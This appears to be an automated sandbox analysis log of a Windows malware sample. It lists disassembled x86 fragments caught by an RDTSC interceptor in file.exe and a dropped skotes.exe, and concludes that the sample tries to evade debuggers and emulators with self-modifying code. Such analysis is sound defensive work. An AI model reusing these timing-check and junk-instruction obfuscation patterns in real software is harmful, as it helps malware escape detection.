Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C409AC second address: 4C409B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C409B2 second address: 4C40A4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 8732h 0x00000007 call 00007F0F345319F3h 0x0000000c pop eax 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov ecx, esi 0x00000012 jmp 00007F0F345319EFh 0x00000017 je 00007F0FA68173A8h 0x0000001d jmp 00007F0F345319F6h 0x00000022 test byte ptr [76FB6968h], 00000002h 0x00000029 jmp 00007F0F345319F0h 0x0000002e jne 00007F0FA6817388h 0x00000034 pushad 0x00000035 movzx esi, bx 0x00000038 jmp 00007F0F345319F3h 0x0000003d popad 0x0000003e mov edx, dword ptr [ebp+0Ch] 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F0F345319F5h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C40A4C second address: 4C40A68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC151h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C40A68 second address: 4C40A6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C40A6C second address: 4C40A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C40A72 second address: 4C40A99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0F345319EEh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C40A99 second address: 4C40AE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC14Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b mov edi, esi 0x0000000d push ecx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ebx 0x00000011 popad 0x00000012 xchg eax, ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F0F34BEC155h 0x0000001c and ch, FFFFFFF6h 0x0000001f jmp 00007F0F34BEC151h 0x00000024 popfd 0x00000025 movzx esi, di 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C40AE4 second address: 4C40AEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C40AEA second address: 4C40AEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C40BB4 second address: 4C40BD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dx, ax 0x00000008 popad 0x00000009 pop esi 0x0000000a pushad 0x0000000b mov eax, 442C390Dh 0x00000010 mov edi, esi 0x00000012 popad 0x00000013 pop ebx 0x00000014 pushad 0x00000015 pushad 0x00000016 mov edx, eax 0x00000018 mov cl, 92h 0x0000001a popad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C40BD2 second address: 4C40C0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F0F34BEC155h 0x0000000a xor esi, 73F32346h 0x00000010 jmp 00007F0F34BEC151h 0x00000015 popfd 0x00000016 popad 0x00000017 popad 0x00000018 mov esp, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C40C0E second address: 4C40C12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C40C12 second address: 4C40C16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C40C16 second address: 4C40C1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50B14 second address: 4C50B18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50B18 second address: 4C50B2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD0111 second address: 4CD0116 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD0116 second address: 4CD015B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F0F345319F7h 0x0000000a or ax, 86DEh 0x0000000f jmp 00007F0F345319F9h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD015B second address: 4CD015F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD015F second address: 4CD0172 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD0172 second address: 4CD01F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC159h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F0F34BEC151h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 mov al, 05h 0x00000013 pushfd 0x00000014 jmp 00007F0F34BEC159h 0x00000019 xor si, E286h 0x0000001e jmp 00007F0F34BEC151h 0x00000023 popfd 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F0F34BEC14Ch 0x0000002e sub ch, 00000028h 0x00000031 jmp 00007F0F34BEC14Bh 0x00000036 popfd 0x00000037 push ecx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0493 second address: 4CC0497 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0497 second address: 4CC049D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC049D second address: 4CC04BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F0F345319F8h 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC04BB second address: 4CC04D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0F34BEC153h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC04D8 second address: 4CC04FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 mov si, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e jmp 00007F0F345319EDh 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC04FB second address: 4CC050E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC14Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC050E second address: 4CC053B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0F345319EDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50E07 second address: 4C50E1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F0F34BEC151h 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50E1E second address: 4C50E3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0F345319F3h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50E3B second address: 4C50E53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F34BEC154h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50E53 second address: 4C50E89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov edx, esi 0x0000000e pushfd 0x0000000f jmp 00007F0F345319F4h 0x00000014 xor esi, 1FFE0638h 0x0000001a jmp 00007F0F345319EBh 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC06D9 second address: 4CC06E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC06E7 second address: 4CC06ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC06ED second address: 4CC06F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC06F3 second address: 4CC06F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC06F7 second address: 4CC0747 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a movsx edx, si 0x0000000d pushfd 0x0000000e jmp 00007F0F34BEC158h 0x00000013 or ax, 8398h 0x00000018 jmp 00007F0F34BEC14Bh 0x0000001d popfd 0x0000001e popad 0x0000001f xchg eax, ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F0F34BEC155h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0747 second address: 4CC0757 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F345319ECh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0757 second address: 4CC075B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC075B second address: 4CC07B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F0F345319F7h 0x0000000f push dword ptr [ebp+0Ch] 0x00000012 jmp 00007F0F345319F6h 0x00000017 push dword ptr [ebp+08h] 0x0000001a jmp 00007F0F345319F0h 0x0000001f push 11D35709h 0x00000024 pushad 0x00000025 mov dx, A732h 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC07B5 second address: 4CC07DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 xor dword ptr [esp], 11D2570Bh 0x0000000d pushad 0x0000000e call 00007F0F34BEC151h 0x00000013 mov edx, esi 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 mov eax, ebx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70306 second address: 4C7030C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C7030C second address: 4C70310 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70310 second address: 4C7033A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F0F345319F9h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C7033A second address: 4C7033E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C7033E second address: 4C70342 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70342 second address: 4C70348 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70348 second address: 4C703A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push FFFFFFFEh 0x0000000b pushad 0x0000000c mov edx, eax 0x0000000e mov di, cx 0x00000011 popad 0x00000012 push 1C9B99C9h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov al, F9h 0x0000001c pushfd 0x0000001d jmp 00007F0F345319F3h 0x00000022 add ax, B60Eh 0x00000027 jmp 00007F0F345319F9h 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C703A5 second address: 4C7040C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC151h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 5A5E264Fh 0x00000010 pushad 0x00000011 movzx esi, di 0x00000014 movsx edx, si 0x00000017 popad 0x00000018 push 4A791C1Bh 0x0000001d pushad 0x0000001e push ebx 0x0000001f mov dx, cx 0x00000022 pop ecx 0x00000023 mov bx, 7BDAh 0x00000027 popad 0x00000028 xor dword ptr [esp], 3C89B21Bh 0x0000002f jmp 00007F0F34BEC151h 0x00000034 mov eax, dword ptr fs:[00000000h] 0x0000003a jmp 00007F0F34BEC14Eh 0x0000003f nop 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C7040C second address: 4C70410 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70410 second address: 4C70416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70416 second address: 4C70425 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F345319EBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70425 second address: 4C70470 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F0F34BEC152h 0x00000010 sbb ah, FFFFFFD8h 0x00000013 jmp 00007F0F34BEC14Bh 0x00000018 popfd 0x00000019 jmp 00007F0F34BEC158h 0x0000001e popad 0x0000001f nop 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70470 second address: 4C70474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70474 second address: 4C704F6 instructions: 0x00000000 rdtsc 0x00000002 mov bx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007F0F34BEC156h 0x0000000d sbb ecx, 49A2C398h 0x00000013 jmp 00007F0F34BEC14Bh 0x00000018 popfd 0x00000019 popad 0x0000001a sub esp, 1Ch 0x0000001d pushad 0x0000001e movzx ecx, dx 0x00000021 mov cx, di 0x00000024 popad 0x00000025 push esp 0x00000026 jmp 00007F0F34BEC158h 0x0000002b mov dword ptr [esp], ebx 0x0000002e jmp 00007F0F34BEC150h 0x00000033 xchg eax, esi 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F0F34BEC157h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C704F6 second address: 4C70515 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 jmp 00007F0F345319EBh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 movzx esi, dx 0x00000015 movsx edx, cx 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70515 second address: 4C7051B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C7051B second address: 4C70544 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0F345319F5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70685 second address: 4C70737 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC151h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F0F34BEC157h 0x00000011 xor ah, FFFFFF9Eh 0x00000014 jmp 00007F0F34BEC159h 0x00000019 popfd 0x0000001a pushad 0x0000001b mov eax, 273B2DBDh 0x00000020 pushfd 0x00000021 jmp 00007F0F34BEC14Ah 0x00000026 and si, E998h 0x0000002b jmp 00007F0F34BEC14Bh 0x00000030 popfd 0x00000031 popad 0x00000032 popad 0x00000033 nop 0x00000034 pushad 0x00000035 call 00007F0F34BEC154h 0x0000003a pop edx 0x0000003b jmp 00007F0F34BEC14Eh 0x00000040 popad 0x00000041 lea eax, dword ptr [ebp-10h] 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F0F34BEC157h 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70737 second address: 4C7073D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C7073D second address: 4C70757 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr fs:[00000000h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0F34BEC14Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70757 second address: 4C70769 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F345319EEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70769 second address: 4C70783 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC14Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70783 second address: 4C70787 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70787 second address: 4C7078D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C7078D second address: 4C707CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319EAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+10h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f movsx edi, cx 0x00000012 pushfd 0x00000013 jmp 00007F0F345319F6h 0x00000018 adc si, 54A8h 0x0000001d jmp 00007F0F345319EBh 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C707CD second address: 4C7086F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 mov eax, ebx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test eax, eax 0x0000000d jmp 00007F0F34BEC14Dh 0x00000012 jne 00007F0FA6E3B683h 0x00000018 jmp 00007F0F34BEC14Eh 0x0000001d sub eax, eax 0x0000001f pushad 0x00000020 mov di, CD02h 0x00000024 jmp 00007F0F34BEC153h 0x00000029 popad 0x0000002a mov dword ptr [ebp-20h], eax 0x0000002d pushad 0x0000002e pushad 0x0000002f movzx esi, bx 0x00000032 pushfd 0x00000033 jmp 00007F0F34BEC153h 0x00000038 add eax, 63B1E55Eh 0x0000003e jmp 00007F0F34BEC159h 0x00000043 popfd 0x00000044 popad 0x00000045 popad 0x00000046 mov ebx, dword ptr [esi] 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b jmp 00007F0F34BEC153h 0x00000050 mov ch, 76h 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C7086F second address: 4C708B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [ebp-24h], ebx 0x0000000c pushad 0x0000000d mov edi, ecx 0x0000000f call 00007F0F345319EAh 0x00000014 mov ah, 2Dh 0x00000016 pop edi 0x00000017 popad 0x00000018 test ebx, ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F0F345319F9h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C708B6 second address: 4C708BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C708BC second address: 4C708C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60E17 second address: 4C60E60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC159h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007F0F34BEC150h 0x0000000e mov cx, 26A1h 0x00000012 pop ecx 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F0F34BEC153h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60E60 second address: 4C60EBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0F345319EFh 0x00000009 add eax, 31CB37FEh 0x0000000f jmp 00007F0F345319F9h 0x00000014 popfd 0x00000015 mov esi, 2513D447h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebp 0x0000001e pushad 0x0000001f jmp 00007F0F345319F8h 0x00000024 pushad 0x00000025 mov eax, 51810227h 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: B0F8C1 second address: B0F8C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: B0F8C6 second address: B0F8CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: C78A44 second address: C78A6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 jmp 00007F0F34BEC159h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: C896DF second address: C89701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F0F345319E6h 0x0000000a pop ebx 0x0000000b pop esi 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0F345319F1h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
